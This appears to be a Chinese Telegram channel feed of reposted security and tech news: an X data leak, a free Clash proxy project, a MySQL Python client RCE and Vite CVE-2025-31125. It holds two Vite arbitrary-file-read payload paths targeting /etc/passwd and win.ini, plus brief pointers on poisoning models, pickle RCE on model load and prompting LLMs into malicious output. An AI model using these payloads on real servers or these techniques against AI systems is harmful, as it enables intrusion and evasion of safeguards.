Forwarded from 每日消费电子观察 (horo)
X 平台被曝遭遇严重数据泄露,涉及超 28 亿条个人数据信息 - IT之家
https://www.ithome.com/0/841/904.htm
https://www.ithome.com/0/841/904.htm
Ithome
X 平台被曝遭遇严重数据泄露,涉及超 28 亿条个人数据信息 - IT之家
这一规模远超 X 平台现有的约 3.357 亿个用户,因此该泄露数据集除实际活跃用户外可能还包含了大量等特殊账户,也无法排除从第三方获得的可能。
搞了一个免费的clash翻墙订阅,自动从网上爬取能用的clash代理,选取速度最快的发在Github上,每30分钟更新一次(
https://github.com/PuddinCat/BestClash
https://github.com/PuddinCat/BestClash
GitHub
GitHub - PuddinCat/BestClash: 每30分钟更新!免费Clash翻墙订阅,自动从网上爬取并测速 | 免费代理 | VPN | 订阅 | 节点 | clash meta | mihomo | 翻墙 | 科学上网 | 梯子 |
每30分钟更新!免费Clash翻墙订阅,自动从网上爬取并测速 | 免费代理 | VPN | 订阅 | 节点 | clash meta | mihomo | 翻墙 | 科学上网 | 梯子 | - PuddinCat/BestClash
❤4👍1
mysql的python客户端rce CVE-2025-21548
论为什么python里到处都是eval
https://mp.weixin.qq.com/s/h3qOUrzhANfDJ0PuAJyc6w
论为什么python里到处都是eval
https://mp.weixin.qq.com/s/h3qOUrzhANfDJ0PuAJyc6w
Puddin在TG上看到了啥
搞了一个免费的clash翻墙订阅,自动从网上爬取能用的clash代理,选取速度最快的发在Github上,每30分钟更新一次( https://github.com/PuddinCat/BestClash
跑了一天,代理质量还是不错的,就是我的电脑内存爆了
而且还发现python的一个bug,就是python的with语句会影响异步上下文的切换,然后就会让本来应该异步运行的函数卡住
而且还发现python的一个bug,就是python的with语句会影响异步上下文的切换,然后就会让本来应该异步运行的函数卡住
❤1
Forwarded from Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init
/@fs/C://windows/win.ini?import&?inline=1.wasm?init
Eternal_安全内参
/@fs/etc/passwd?import&?inline=1.wasm?init /@fs/C://windows/win.ini?import&?inline=1.wasm?init
vite还在发力
CVE-2025-31125(CVE-2025-30208的Bypass)
CVE-2025-31125(CVE-2025-30208的Bypass)
1. 污染训练数据+prompt欺骗生成恶意内容+在模型参数低位隐写数据+修改模型参数影响模型运行结果
2. 通过pickle反序列化等实现加载模型时RCE,使用eBPF监测修改模型文件等恶意行为
3. 用大模型检测日志
4. 总结了一下LLM相关的安全问题
5. 如何让大模型生成恶意内容
6. 总结了一些漏洞挖掘的知识
说有用吧好像又没用,说没用吧好像也有点用
Puddin在TG上看到了啥
deepseek 自己把自己xss了 https://t.me/dev_meme/6448
前情提要,LLM理论上可以XSS攻击用户(
Forwarded from Eternal_安全内参
从CVE-2025-30208看任意文件读取利用 - AabyssZG's Blog
https://blog.zgsec.cn/archives/713.html
https://blog.zgsec.cn/archives/713.html
blog.zgsec.cn
Aabyss's Blog